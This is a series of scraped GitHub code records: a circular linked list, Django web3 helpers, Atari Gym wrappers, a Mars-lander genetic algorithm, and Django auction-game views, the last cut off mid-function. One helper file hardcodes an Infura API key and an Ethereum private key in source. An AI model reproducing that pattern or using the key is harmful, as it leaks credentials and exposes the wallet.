self.head\n\n else:\n self.head = newNode\n tail = newNode\n tail.next = self.head\n\n def printList(self, first=None):\n self.first = first\n first = self.head\n if first is None:\n print(\"List is empty.\")\n\n current = first\n # print(current.data)\n\n while True:\n print(current.data, \"-->\", end=\" \")\n current = current.next\n if current is self.head:\n break\n print(\"None\")\n\n\nobj = LinkedList()\n\nobj.add(8)\nobj.printList()\nobj.add(5)\nobj.printList()\nobj.add(6)\nobj.printList()\nobj.add(2)\nobj.printList()\n","repo_name":"shrutikatayde/DSAWITHPYTHON","sub_path":"LINKEDLIST/2_CIRCULAR LINKEDLIST/1_creation_traversing.py","file_name":"1_creation_traversing.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12593811053","text":"from web3 import Web3\nfrom django.utils import dateformat, formats\n\n\ndef attribute_dict_to_dict(dict_to_parse):\n # convert any 'AttributeDict' type found to 'dict'\n parsed_dict = dict(dict_to_parse)\n for key, val in parsed_dict.items():\n # check for nested dict structures to iterate through\n if 'dict' in str(type(val)).lower():\n parsed_dict[key] = attribute_dict_to_dict(val)\n # convert 'HexBytes' type to 'str'\n elif 'HexBytes' in str(type(val)):\n parsed_dict[key] = val.hex()\n return parsed_dict\n\n\ndef certificate_to_dictionary(certificate):\n # convert any certificate object to 'dict'\n dictionary = {\n 'name': certificate.name,\n 'surname': certificate.surname,\n 'date_of_birth': dateformat.format(certificate.date_of_birth, formats.get_format('DATE_FORMAT')),\n 'grade': certificate.grade,\n 'subject': certificate.subject,\n 'date_of_creation': dateformat.format(certificate.date_of_creation, formats.get_format('DATE_FORMAT')),\n }\n return dictionary\n\n\ndef get_transaction_by_hash(transaction_hash):\n w3 = Web3(Web3.HTTPProvider('https://goerli.infura.io/v3/c83796f78d1a468593d02c4e8c9b2e3e'))\n transaction = attribute_dict_to_dict(w3.eth.get_transaction(transaction_hash))\n return transaction\n\n\ndef send_transaction(message, address_to, address_from, private_key, amount):\n w3 = Web3(Web3.HTTPProvider('https://goerli.infura.io/v3/c83796f78d1a468593d02c4e8c9b2e3e'))\n address = '0x00583328725E92B2e9E45a0c96058c533B6aB76d'\n private_key = '0x0bd7acb0531d3cb2d4595475b3ef5f9027c4c1f0420e591cb2c1a0243c4b6a79'\n nonce = w3.eth.getTransactionCount(address)\n gas_price = w3.eth.gasPrice\n value = w3.toWei(amount, 'ether')\n signed_tx = w3.eth.account.signTransaction(dict(\n nonce=nonce,\n gasPrice=gas_price,\n gas=100000,\n to=address_to,\n value=value,\n data=message.encode('utf-8'),\n ), private_key)\n tx = w3.eth.sendRawTransaction(signed_tx.rawTransaction)\n tx_id = w3.toHex(tx)\n return tx_id\n\n\n","repo_name":"TomDiFrancesco/DjangoRedis","sub_path":"app/iacademy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32831999150","text":"\"\"\" Environment wrappers. \"\"\"\nfrom collections import deque\n\nimport cv2\nimport gym\nimport gym.spaces as spaces\nfrom gym.envs import atari\nimport numpy as np\nimport tensorflow as tf\nfrom collections import deque\n\nfrom util.env_batch import ParallelEnvBatch\ncv2.ocl.setUseOpenCL(False)\n\nclass NoopResetEnv(gym.Wrapper):\n def __init__(self, env, noop_max=30):\n \"\"\"Sample initial states by taking random number of no-ops on reset.\n No-op is assumed to be action 0.\n \"\"\"\n gym.Wrapper.__init__(self, env)\n self.noop_max = noop_max\n self.override_num_noops = None\n self.noop_action = 0\n assert env.unwrapped.get_action_meanings()[0] == 'NOOP'\n\n def _reset(self, **kwargs):\n \"\"\" Do no-op action for a number of steps in [1, noop_max].\"\"\"\n self.env.reset(**kwargs)\n if self.override_num_noops is not None:\n noops = self.override_num_noops\n else:\n noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101\n assert noops > 0\n obs = None\n for _ in range(noops):\n obs, _, done, _ = self.env.step(self.noop_action)\n if done:\n obs = self.env.reset(**kwargs)\n return obs\n\n\n\n\nclass EpisodicLifeEnv(gym.Wrapper):\n def __init__(self, env):\n \"\"\"Make end-of-life == end-of-episode, but only reset on true game over.\n Done by DeepMind for the DQN and co. since it helps value estimation.\n \"\"\"\n gym.Wrapper.__init__(self, env)\n self.lives = 0\n self.was_real_done = True\n\n def _step(self, action):\n obs, reward, done, info = self.env.step(action)\n self.was_real_done = done\n # check current lives, make loss of life terminal,\n # then update lives to handle bonus lives\n lives = self.env.unwrapped.ale.lives()\n if lives < self.lives and lives > 0:\n # for Qbert somtimes we stay in lives == 0 condtion for a few frames\n # so its important to keep lives > 0, so that we only reset once\n # the environment advertises done.\n done = True\n self.lives = lives\n return obs, reward, done, info\n\ndef _reset(self, **kwargs):\n \"\"\"Reset only when lives are exhausted.\n This way all states are still reachable even though lives are episodic,\n and the learner need not know about any of this behind-the-scenes.\n \"\"\"\n if self.was_real_done:\n obs = self.env.reset(**kwargs)\n else:\n # no-op step to advance from terminal/lost life state\n obs, _, _, _ = self.env.step(0)\n self.lives = self.env.unwrapped.ale.lives()\n return obs\n\n\nclass FireReset(gym.Wrapper):\n \"\"\" Makes fire action when reseting environment.\n\n Some environments are fixed until the agent makes the fire action,\n this wrapper makes this action so that the epsiode starts automatically.\n \"\"\"\n def __init__(self, env):\n super(FireReset, self).__init__(env)\n action_meanings = env.unwrapped.get_action_meanings()\n if len(action_meanings) < 3:\n raise ValueError(\n \"env.unwrapped.get_action_meanings() must be of length >= 3\"\n f\"but is of length {len(action_meanings)}\")\n if env.unwrapped.get_action_meanings()[1] != \"FIRE\":\n raise ValueError(\n \"env.unwrapped.get_action_meanings() must have 'FIRE' \"\n f\"under index 1, but is {action_meanings}\")\n\n def step(self, action):\n return self.env.step(action)\n\n def reset(self, **kwargs):\n self.env.reset(**kwargs)\n obs, _, done, _ = self.env.step(1)\n if done:\n self.env.reset(**kwargs)\n obs, _, done, _ = self.env.step(2)\n if done:\n self.env.reset(**kwargs)\n return obs\n\n\nclass FireResetEnv(gym.Wrapper):\n def __init__(self, env):\n \"\"\"Take action on reset for environments that are fixed until firing.\"\"\"\n gym.Wrapper.__init__(self, env)\n assert env.unwrapped.get_action_meanings()[1] == 'FIRE'\n assert len(env.unwrapped.get_action_meanings()) >= 3\n\n def _reset(self, **kwargs):\n self.env.reset(**kwargs)\n obs, _, done, _ = self.env.step(1)\n if done:\n self.env.reset(**kwargs)\n obs, _, done, _ = self.env.step(2)\n if done:\n self.env.reset(**kwargs)\n return obs\n\n\nclass StartWithRandomActions(gym.Wrapper):\n \"\"\" Makes random number of random actions at the beginning of each\n episode. \"\"\"\n def __init__(self, env, max_random_actions=30):\n super(StartWithRandomActions, self).__init__(env)\n self.max_random_actions = max_random_actions\n self.real_done = True\n\n def step(self, action):\n obs, rew, done, info = self.env.step(action)\n self.real_done = info.get(\"real_done\", True)\n return obs, rew, done, info\n\n def reset(self, **kwargs):\n obs = self.env.reset()\n if self.real_done:\n num_random_actions = np.random.randint(self.max_random_actions + 1)\n for _ in range(num_random_actions):\n obs, _, _, _ = self.env.step(self.env.action_space.sample())\n self.real_done = False\n return obs\n\n\nclass ImagePreprocessing(gym.ObservationWrapper):\n \"\"\" Preprocesses image-observations by possibly grayscaling and resizing. \"\"\"\n def __init__(self, env, width=84, height=84, grayscale=True):\n super(ImagePreprocessing, self).__init__(env)\n self.width = width\n self.height = height\n self.grayscale = grayscale\n ospace = self.env.observation_space\n low, high, dtype = ospace.low.min(), ospace.high.max(), ospace.dtype\n if self.grayscale:\n self.observation_space = spaces.Box(low=low, high=high,\n shape=(width, height), dtype=dtype)\n else:\n obs_shape = (width, height) + self.observation_space.shape[2:]\n self.observation_space = spaces.Box(low=low, high=high,\n shape=obs_shape, dtype=dtype)\n\n def observation(self, observation):\n \"\"\" Performs image preprocessing. \"\"\"\n if self.grayscale:\n observation = cv2.cvtColor(observation, cv2.COLOR_RGB2GRAY)\n observation = cv2.resize(observation, (self.width, self.height),\n cv2.INTER_AREA)\n return observation\n\n\nclass MaxBetweenFrames(gym.ObservationWrapper):\n \"\"\" Takes maximum between two subsequent frames. \"\"\"\n def __init__(self, env):\n if (isinstance(env.unwrapped, atari.AtariEnv) and\n \"NoFrameskip\" not in env.spec.id):\n raise ValueError(\"MaxBetweenFrames requires NoFrameskip in atari env id\")\n super(MaxBetweenFrames, self).__init__(env)\n self.last_obs = None\n\n def observation(self, observation):\n obs = np.maximum(observation, self.last_obs)\n self.last_obs = observation\n return obs\n\n def reset(self, **kwargs):\n self.last_obs = self.env.reset()\n return self.last_obs\n\n\nclass QueueFrames(gym.ObservationWrapper):\n \"\"\" Queues specified number of frames together along new dimension. \"\"\"\n def __init__(self, env, nframes, concat=False):\n super(QueueFrames, self).__init__(env)\n self.obs_queue = deque([], maxlen=nframes)\n self.concat = concat\n ospace = self.observation_space\n if self.concat:\n oshape = ospace.shape[:-1] + (ospace.shape[-1] * nframes,)\n else:\n oshape = ospace.shape + (nframes,)\n self.observation_space = spaces.Box(ospace.low.min(), ospace.high.max(),\n oshape, ospace.dtype)\n\n\n def observation(self, observation):\n self.obs_queue.append(observation)\n return (np.concatenate(self.obs_queue, -1) if self.concat\n else np.dstack(self.obs_queue))\n\n def reset(self, **kwargs):\n obs = self.env.reset()\n for _ in range(self.obs_queue.maxlen - 1):\n self.obs_queue.append(obs)\n return self.observation(obs)\n\n\nclass SkipFrames(gym.Wrapper):\n \"\"\" Performs the same action for several steps and returns the final result.\n \"\"\"\n def __init__(self, env, nskip=4):\n super(SkipFrames, self).__init__(env)\n if (isinstance(env.unwrapped, atari.AtariEnv) and\n \"NoFrameskip\" not in env.spec.id):\n raise ValueError(\"SkipFrames requires NoFrameskip in atari env id\")\n self.nskip = nskip\n\n def step(self, action):\n total_reward = 0.0\n for _ in range(self.nskip):\n obs, rew, done, info = self.env.step(action)\n total_reward += rew\n if done:\n break\n return obs, total_reward, done, info\n\n def reset(self, **kwargs):\n return self.env.reset(**kwargs)\n\n\nclass ClipReward(gym.RewardWrapper):\n \"\"\" Modifes reward to be in {-1, 0, 1} by taking sign of it. \"\"\"\n def reward(self, reward):\n return np.sign(reward)\n\n\nclass TFSummaries(gym.Wrapper):\n \"\"\" Writes env summaries.\"\"\"\n def __init__(self, env, prefix=None, running_mean_size=100, step_var=None):\n super(TFSummaries, self).__init__(env)\n self.episode_counter = 0\n self.prefix = prefix or self.env.spec.id\n self.step_var = (step_var if step_var is not None\n else tf.train.get_global_step())\n\n nenvs = getattr(self.env.unwrapped, \"nenvs\", 1)\n self.rewards = np.zeros(nenvs)\n self.had_ended_episodes = np.zeros(nenvs, dtype=np.bool)\n self.episode_lengths = np.zeros(nenvs)\n self.reward_queues = [deque([], maxlen=running_mean_size)\n for _ in range(nenvs)]\n\n def should_write_summaries(self):\n \"\"\" Returns true if it's time to write summaries. \"\"\"\n return np.all(self.had_ended_episodes)\n\n def add_summaries(self):\n \"\"\" Writes summaries. \"\"\"\n tf.contrib.summary.scalar(\n f\"{self.prefix}/total_reward\",\n tf.reduce_mean([q[-1] for q in self.reward_queues]),\n step=self.step_var)\n tf.contrib.summary.scalar(\n f\"{self.prefix}/reward_mean_{self.reward_queues[0].maxlen}\",\n tf.reduce_mean([np.mean(q) for q in self.reward_queues]),\n step=self.step_var)\n tf.contrib.summary.scalar(\n f\"{self.prefix}/episode_length\",\n tf.reduce_mean(self.episode_lengths),\n step=self.step_var)\n if self.had_ended_episodes.size > 1:\n tf.contrib.summary.scalar(\n f\"{self.prefix}/min_reward\",\n min(q[-1] for q in self.reward_queues),\n step=self.step_var)\n tf.contrib.summary.scalar(\n f\"{self.prefix}/max_reward\",\n max(q[-1] for q in self.reward_queues),\n step=self.step_var)\n self.episode_lengths.fill(0)\n self.had_ended_episodes.fill(False)\n\n def step(self, action):\n obs, rew, done, info = self.env.step(action)\n self.rewards += rew\n self.episode_lengths[~self.had_ended_episodes] += 1\n\n info_collection = [info] if isinstance(info, dict) else info\n done_collection = [done] if isinstance(done, bool) else done\n done_indices = [i for i, info in enumerate(info_collection)\n if info.get(\"real_done\", done_collection[i])]\n for i in done_indices:\n if not self.had_ended_episodes[i]:\n self.had_ended_episodes[i] = True\n self.reward_queues[i].append(self.rewards[i])\n self.rewards[i] = 0\n\n if self.should_write_summaries():\n self.add_summaries()\n return obs, rew, done, info\n\n def reset(self, **kwargs):\n self.rewards.fill(0)\n self.episode_lengths.fill(0)\n self.had_ended_episodes.fill(False)\n return self.env.reset(**kwargs)\n\n\nclass MaxAndSkipEnv(gym.Wrapper):\n def __init__(self, env, skip=4):\n \"\"\"Return only every `skip`-th frame\"\"\"\n gym.Wrapper.__init__(self, env)\n # most recent raw observations (for max pooling across time steps)\n self._obs_buffer = np.zeros((2,)+env.observation_space.shape, dtype='uint8')\n self._skip = skip\n\n def _step(self, action):\n \"\"\"Repeat action, sum reward, and max over last observations.\"\"\"\n total_reward = 0.0\n done = None\n for i in range(self._skip):\n obs, reward, done, info = self.env.step(action)\n if i == self._skip - 2: self._obs_buffer[0] = obs\n if i == self._skip - 1: self._obs_buffer[1] = obs\n total_reward += reward\n if done:\n break\n # Note that the observation on the done=True frame\n # doesn't matter\n max_frame = self._obs_buffer.max(axis=0)\n\n return max_frame, total_reward, done, info\n\n\nclass WarpFrame(gym.ObservationWrapper):\n def __init__(self, env):\n \"\"\"Warp frames to 84x84 as done in the Nature paper and later work.\"\"\"\n gym.ObservationWrapper.__init__(self, env)\n self.width = 84\n self.height = 84\n self.observation_space = spaces.Box(low=0, high=255, shape=(self.height, self.width, 1))\n\n def _observation(self, frame):\n frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\n frame = cv2.resize(frame, (self.width, self.height), interpolation=cv2.INTER_AREA)\n return frame[:, :, None]\n\n\nclass FrameStack(gym.Wrapper):\n def __init__(self, env, k):\n \"\"\"Stack k last frames.\n\n Returns lazy array, which is much more memory efficient.\n\n See Also\n --------\n baselines.common.atari_wrappers.LazyFrames\n \"\"\"\n gym.Wrapper.__init__(self, env)\n self.k = k\n self.frames = deque([], maxlen=k)\n shp = env.observation_space.shape\n self.observation_space = spaces.Box(low=0, high=255, shape=(shp[0], shp[1], shp[2] * k))\n\n def _reset(self):\n ob = self.env.reset()\n for _ in range(self.k):\n self.frames.append(ob)\n return self._get_ob()\n\n def _step(self, action):\n ob, reward, done, info = self.env.step(action)\n self.frames.append(ob)\n return self._get_ob(), reward, done, info\n\n def _get_ob(self):\n assert len(self.frames) == self.k\n return LazyFrames(list(self.frames))\n\n\nclass ScaledFloatFrame(gym.ObservationWrapper):\n def _observation(self, observation):\n # careful! This undoes the memory optimization, use\n # with smaller replay buffers only.\n return np.array(observation).astype(np.float32) / 255.0\n\nclass LazyFrames(object):\n def __init__(self, frames):\n \"\"\"This object ensures that common frames between the observations are only stored once.\n It exists purely to optimize memory usage which can be huge for DQN's 1M frames replay\n buffers.\n\n This object should only be converted to numpy array before being passed to the model.\n\n You'd not believe how complex the previous solution was.\"\"\"\n self._frames = frames\n\n def __array__(self, dtype=None):\n out = np.concatenate(self._frames, axis=2)\n if dtype is not None:\n out = out.astype(dtype)\n return out\n\n\ndef make_atari(env_id):\n env = gym.make(env_id)\n assert 'NoFrameskip' in env.spec.id\n env = NoopResetEnv(env, noop_max=30)\n env = MaxAndSkipEnv(env, skip=4)\n return env\n\n\ndef wrap_deepmind(env, episode_life=True, clip_rewards=True, frame_stack=False, scale=False):\n \"\"\"Configure environment for DeepMind-style Atari.\n \"\"\"\n if episode_life:\n env = EpisodicLifeEnv(env)\n if 'FIRE' in env.unwrapped.get_action_meanings():\n env = FireResetEnv(env)\n env = WarpFrame(env)\n if scale:\n env = ScaledFloatFrame(env)\n if clip_rewards:\n env = ClipReward(env)\n if frame_stack:\n env = FrameStack(env, 4)\n return env\n\n\ndef nature_dqn_env(env_id, nenvs=None, seed=None,\n summaries=True, clip_reward=True):\n \"\"\" Wraps env as in Nature DQN paper. \"\"\"\n if \"NoFrameskip\" not in env_id:\n raise ValueError(f\"env_id must have 'NoFrameskip' but is {env_id}\")\n if nenvs is not None:\n if seed is None:\n seed = list(range(nenvs))\n if isinstance(seed, int):\n seed = [seed] * nenvs\n if len(seed) != nenvs:\n raise ValueError(f\"seed has length {len(seed)} but must have \"\n f\"length equal to nenvs which is {nenvs}\")\n\n env = ParallelEnvBatch([\n lambda i=i, env_seed=env_seed: nature_dqn_env(\n env_id, seed=env_seed, summaries=False, clip_reward=False)\n for i, env_seed in enumerate(seed)\n ])\n if summaries:\n env = TFSummaries(env, prefix=env_id)\n if clip_reward:\n env = ClipReward(env)\n return env\n\n env = gym.make(env_id)\n env.seed(seed)\n if summaries:\n env = TFSummaries(env)\n env = EpisodicLifeEnv(env)\n if \"FIRE\" in env.unwrapped.get_action_meanings():\n env = FireReset(env)\n env = StartWithRandomActions(env, max_random_actions=30)\n env = MaxBetweenFrames(env)\n env = SkipFrames(env, 4)\n env = ImagePreprocessing(env, width=84, height=84, grayscale=True)\n env = QueueFrames(env, 4)\n if clip_reward:\n env = ClipReward(env)\n return env\n","repo_name":"denklewer/yandex-rl-tasks","sub_path":"util/atari_wrappers_a2c.py","file_name":"atari_wrappers_a2c.py","file_ext":"py","file_size_in_byte":16581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12272864377","text":"import random\nimport math\n\n\nclass Fusee:\n\n def __init__(self, position, fuel, Commandes={}):\n self.x, self.y = position\n self.vx, self.vy = 0, 0\n\n self.fuel = fuel\n\n self.angle = 0\n self.power = 0\n\n self.but = (self.angle, self.power)\n\n self.Commandes = Commandes\n \n def maj(self, compteur, but_power, but_angle, Memoriser_lancement=True):\n if Memoriser_lancement is True:\n if (but_angle, but_power) != self.but:\n self.Commandes[compteur] = (but_angle, but_power)\n self.but = but_angle, but_power\n\n\n if self.fuel == 0:\n self.power = 0\n else:\n if self.power < but_power:\n self.power += 1\n elif self.power > but_power:\n self.power -= 1\n \n if self.angle < but_angle:\n self.angle += 15\n if self.angle > but_angle: self.angle = but_angle\n elif self.angle > but_angle:\n self.angle -= 15\n if self.angle < but_angle: self.angle = but_angle\n\n self.vx -= math.sin(self.angle) * self.power\n self.vy += math.cos(self.angle) * self.power\n\n\n self.vy += Game.pesanteur\n self.fuel -= self.power\n\n \nclass Game:\n next_id = 0\n Vitesse_max = (20, 40)\n pesanteur = -3.711\n\n def __init__(self, *args, **kwargs):\n if len(args) < 5:\n args = args[0]\n Terrain, terrain_largeur, terrain_hauteur, fuel, proba_commande = args\n\n self.Terrain = Terrain \n self.terrain_largeur, self.terrain_hauteur = terrain_largeur, terrain_hauteur\n\n #self.Trajectoire sert pour l'affichage et l'évaluation seulement\n # alors que self.fusee.Commandes sert pour les crossover et mutations\n self.Trajectoire = []\n \n self.proba_commande_angle, self.proba_commande_power = proba_commande\n\n self.fuel = fuel\n\n if len(kwargs) == 0:\n self.fusee = Fusee(self.Terrain.Pos_depart, self.fuel)\n self.vitesse_arrivee = self._jeu()\n else:\n self.fusee = Fusee(self.Terrain.Pos_depart, self.fuel, kwargs['Commandes'])\n self._init_rejouer()\n \n self.id = Game.next_id\n Game.next_id += 1\n \n def _init_rejouer(self):\n self.Trajectoire = []\n\n self.fusee.x, self.fusee.y = self.Terrain.Pos_depart\n self.fusee.vx, self.fusee.vy = 0, 0\n\n self.fusee.fuel = self.fuel\n\n self.fusee.angle = 0\n self.fusee.power = 0\n\n self.vitesse_arrivee = self.rejouer() \n\n def __str__(self):\n return str(self.vitesse_arrivee) + str(self.Trajectoire)\n\n def _toucherSol(self):\n if self.fusee.x > self.terrain_largeur or self.fusee.x < 0:\n return False\n \n x = self.fusee.x\n y = self.fusee.y\n\n for k in range(len(self.Terrain.Points)-1):\n xA, yA = self.Terrain.Points[k]\n xB, yB = self.Terrain.Points[k+1]\n\n if xA < x and x < xB:\n if y <= (yB - yA) * (x - xA) / (xB-xA) + yA:\n return True\n elif xA == xB:\n if y < yA or y < yB:\n if (self.Trajectoire[-2][0] - xA) * (self.Trajectoire[-1][0] - xA) < 0:\n return True\n \n if x == xA and y <= yA: return True\n if x == xB and y <= yB: return True\n \n return False\n \n def _piloter(self, but):\n nouv_angle, nouv_power = but\n\n r_changement_angle = random.random()\n r_changement_power = random.random()\n if self.proba_commande_angle >= r_changement_angle:\n nouv_angle = random.randint(-90, 90)\n if self.proba_commande_power >= r_changement_power:\n nouv_power = random.randint(0, 4)\n \n return (nouv_angle, nouv_power)\n\n def _jeu(self):\n but_power = random.randint(0,4)\n but_angle = random.randint(-90,90)\n\n compteur = 0\n while self._toucherSol() is not True:\n self.fusee.y += self.fusee.vy\n self.fusee.x += self.fusee.vx\n\n but_angle, but_power = self._piloter((but_angle, but_power))\n self.fusee.maj(compteur, but_power, but_angle) \n\n self.Trajectoire.append((self.fusee.x, self.fusee.y))\n compteur += 1\n return (self.fusee.vx, self.fusee.vy)\n\n def rejouer(self):\n but_power = self.fusee.power\n but_angle = self.fusee.angle\n\n compteur = 0\n while self._toucherSol() is not True:\n self.fusee.y += self.fusee.vy\n self.fusee.x += self.fusee.vx\n\n try:\n but_angle, but_power = self.fusee.Commandes[compteur]\n except KeyError: pass\n\n self.fusee.maj(compteur, but_power, but_angle, False) \n\n self.Trajectoire.append((self.fusee.x, self.fusee.y))\n compteur += 1\n return (self.fusee.vx, self.fusee.vy)\n\n def evaluer(self):\n i1, i2 = self.Terrain.Zones\n\n x1, y1 = self.Terrain.Points[i1]\n x2 = self.Terrain.Points[i2][0]\n x_centre = int((x1 + x2)/2)\n\n dx = self.fusee.x - x_centre\n dy = self.fusee.y - y1\n distance_centre = math.sqrt(dx**2 + dy**2)\n\n vx, vy = self.vitesse_arrivee\n max_x, max_y = Game.Vitesse_max\n\n ratio_x, ratio_y = vx / max_x, vy / max_y\n ratio = (ratio_x + ratio_y) / 2\n\n #INTERMEDIAIRE PAS DE VITESSE\n return distance_centre\n \n def mutation(self, proba_mutation):\n proba_mutation_angle, proba_mutation_power = proba_mutation\n\n une_mutation = False\n for k in self.fusee.Commandes.keys():\n r_muter_angle = random.random()\n r_muter_power = random.random()\n\n nouv_angle, nouv_power = self.fusee.Commandes[k]\n if proba_mutation_angle >= r_muter_angle:\n nouv_angle = random.randint(-90, 90)\n une_mutation = True\n if proba_mutation_power >= r_muter_power:\n nouv_power = random.randint(0, 4)\n une_mutation = True\n\n self.fusee.Commandes[k] = (nouv_angle, nouv_power)\n\n if une_mutation is True:\n self._init_rejouer()\n\n return une_mutation\n","repo_name":"yannisEF/Mars-landing","sub_path":"classe_game.py","file_name":"classe_game.py","file_ext":"py","file_size_in_byte":6402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"30434907964","text":"from random import randint\n\nfrom django.http import HttpResponse\nfrom django.contrib.auth import login, authenticate\nfrom django.contrib.auth.forms import UserCreationForm, User\nfrom django.shortcuts import render, redirect\nfrom django.utils import translation, timezone\nfrom django.utils.translation import gettext_lazy as _\n\nfrom django.http import HttpResponseForbidden\n\n# Create your views here.\nfrom main.GameLogic import GENERATE_NEW_ITEM, LocalItem, ValidateItem, RemoveItem, EquipItem, ProcessLoots, SellLoot, \\\n doFilter, RemoveActiveBet, LocalHistory, LocalLoot, LocalBet\nfrom main.models import Character, Item, Loot, Bid, AuctionLog\n\n\ndef set_language(request, code):\n translation.activate(code)\n request.session[translation.LANGUAGE_SESSION_KEY] = code\n return redirect('/')\n\n\ndef index(request, msg=\"\"):\n if request.user.is_authenticated:\n\n current_user = request.user\n\n char, ok = Character.objects.get_or_create(user=current_user)\n\n context = {'char': char, 'user': current_user, 'msg': msg}\n\n return render(request, \"game.html\", context)\n else:\n return render(request, 'base.html')\n\n\ndef signup(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n login(request, user)\n return redirect('index')\n else:\n form = UserCreationForm()\n return render(request, 'registration/signup.html', {'form': form})\n\n\ndef getFreeGold(request):\n if request.user.is_authenticated:\n current_user = request.user\n char = Character.objects.get(user=current_user)\n r = randint(1, 100)\n char.gold += r\n char.save()\n\n return index(request, \"You have received \" + str(r) + \" gold.\")\n else:\n return HttpResponseForbidden()\n\n\ndef getItem(request):\n if request.user.is_authenticated:\n current_user = request.user\n char = Character.objects.get(user=current_user)\n NewItem = Item.objects.get(pk=GENERATE_NEW_ITEM(char.pk))\n\n return index(request, \"You have recived \" + NewItem.item_name + \".\")\n else:\n return HttpResponseForbidden()\n\n\ndef Inventory(request):\n if request.user.is_authenticated:\n\n current_user = request.user\n char = Character.objects.get(user=current_user)\n\n itemz = Item.objects.filter(character_id=char.pk)\n\n stats = [0, 0, 0, 0, 0, 0, 0]\n ilvl = 0\n\n LocalItems = []\n EqItem = [0, 0, 0, 0]\n\n for x in itemz:\n\n local_item = LocalItem(x)\n\n if (char.eq_armor == x or char.eq_helm == x or char.eq_weapon == x or char.eq_offhand == x):\n EqItem[x.item_tupe] = local_item\n ilvl += x.item_level\n for x in range(len(stats)):\n stats[x] += local_item.stats[x]\n elif not x.used:\n LocalItems.append(local_item)\n\n context = {'user': current_user, 'ilvl': ilvl, 'stats': stats, 'items': LocalItems, 'eq_items': EqItem}\n return render(request, 'inventory.html', context=context)\n\n else:\n return HttpResponseForbidden()\n\n\ndef ItemSwitch(request, item_id):\n if request.user.is_authenticated:\n current_user = request.user\n char = Character.objects.get(user=current_user)\n\n item = Item.objects.get(pk=item_id)\n if not item:\n return Inventory(request)\n\n # check if it's equeped\n if char.eq_weapon == item:\n RemoveItem(char, 0)\n elif char.eq_helm == item:\n RemoveItem(char, 1)\n elif char.eq_armor == item:\n RemoveItem(char, 2)\n elif char.eq_offhand == item:\n RemoveItem(char, 3)\n else:\n if not ValidateItem(char, item):\n return HttpResponseForbidden()\n\n RemoveItem(char, item.item_tupe)\n EquipItem(char, item)\n\n return Inventory(request)\n\n\n\n else:\n return HttpResponseForbidden()\n\n\n# main page for Auction\n\n\ndef Auction(request):\n ProcessLoots()\n\n if request.user.is_authenticated:\n\n char = Character.objects.get(user=request.user)\n loots, values = doFilter(request.COOKIES)\n\n print(values)\n context = {'filter': values, 'loots': loots, 'char': char}\n\n return render(request, \"auction/BrowseAuction.html\", context=context)\n\n else:\n return HttpResponseForbidden()\n\n\ndef AuctionActive(request):\n ProcessLoots()\n\n if request.user.is_authenticated:\n current_user = request.user\n char = Character.objects.get(user=current_user)\n\n loots = Loot.objects.filter(character_id=char.pk).filter(active=True)\n bets = Bid.objects.filter(character_id=char.pk)\n\n local_loots = []\n for x in loots:\n local_loots.append(LocalLoot(x))\n local_bets = []\n for x in bets:\n local_bets.append(LocalBet(x))\n\n context = {'loots': local_loots, 'bets': local_bets, 'char': char}\n\n return render(request, 'auction/auction_active.html', context=context)\n else:\n return HttpResponseForbidden()\n\n\ndef AuctionCreate(request):\n if request.user.is_authenticated:\n current_user = request.user\n char = Character.objects.get(user=current_user)\n\n items = Item.objects.filter(character_id=char.pk).filter(used=False)\n\n local_item = []\n\n for x in items:\n local_item.append(LocalItem(x))\n\n context = {'items': local_item, 'char':char}\n\n return render(request, 'auction/auction_make.html', context=context)\n else:\n return HttpResponseForbidden()\n\n\ndef AuctionFed(request):\n ProcessLoots()\n\n if request.user.is_authenticated:\n current_user = request.user\n char = Character.objects.get(user=current_user)\n\n logs = AuctionLog.objects.filter(character_id=char)\n\n local_log = []\n for x in logs:\n local_log.append(LocalHistory(x))\n\n context = {'logs': local_log, 'char': char}\n\n return render(request, 'auction/auction_log.html', context=context)\n\n else:\n return HttpResponseForbidden()\n\n\ndef MakeLoot(request, item_id, buy_price = 0, start_price = 0):\n if request.user.is_authenticated:\n\n current_user = request.user\n char = Character.objects.get(user=current_user)\n item = Item.objects.get(pk=item_id)\n if ValidateItem(char, item):\n\n\n\n if buy_price == 0:\n return AuctionCreate(request)\n\n this_loot = Loot.objects.create()\n this_loot.item_id = item\n this_loot.character_id = char\n this_loot.active = True\n\n if start_price > 0:\n this_loot.biddable = True\n this_loot.next_bid = start_price\n else:\n this_loot.biddable = False\n this_loot.buy_out = buy_price\n this_loot.end_time = timezone.now() + timezone.timedelta(hours=+24)\n\n this_loot.save()\n item.used = True\n item.save()\n\n return AuctionActive(request)\n\n else:\n return HttpResponseForbidden()\n\n else:\n return HttpResponseForbidden()\n\n\ndef BuyLoot(request, loot_id):\n ProcessLoots()\n\n if request.user.is_authenticated:\n\n Buyer = Character.objects.get(user=request.user)\n\n loot = Loot.objects.get(pk=loot_id)\n if not loot:\n # failed to buy race condition or smthing\n return Auction(request)\n\n if Buyer.gold < loot.buy_out:\n return Auction(request)\n\n SellLoot(Buyer, loot, loot.buy_out)\n\n return AuctionFed(request)\n\n else:\n return HttpResponseForbidden()\n\n\ndef RemoveLoot(request, loot_id):\n ProcessLoots()\n\n if request.user.is_authenticated:\n loot = Loot.objects.get(pk=loot_id)\n if not loot:\n return AuctionActive(request)\n\n if loot.character_id != Character.objects.get(user=request.user):\n return HttpResponseForbidden()\n\n bets = Bid.objects.filter(loot_id=loot)\n\n if bets:\n return AuctionActive(request)\n else:\n item = loot.item_id\n item.used = False\n item.save()\n loot.delete()\n return AuctionActive(request)\n\n else:\n return HttpResponseForbidden()\n\n\ndef MakeBet(request, loot_id):\n ProcessLoots()\n\n if request.user.is_authenticated:\n loot = Loot.objects.get(pk=loot_id)\n if not loot.biddable:\n return HttpResponseForbidden()\n\n new_bid = loot.next_bid\n\n if (not new_bid) or 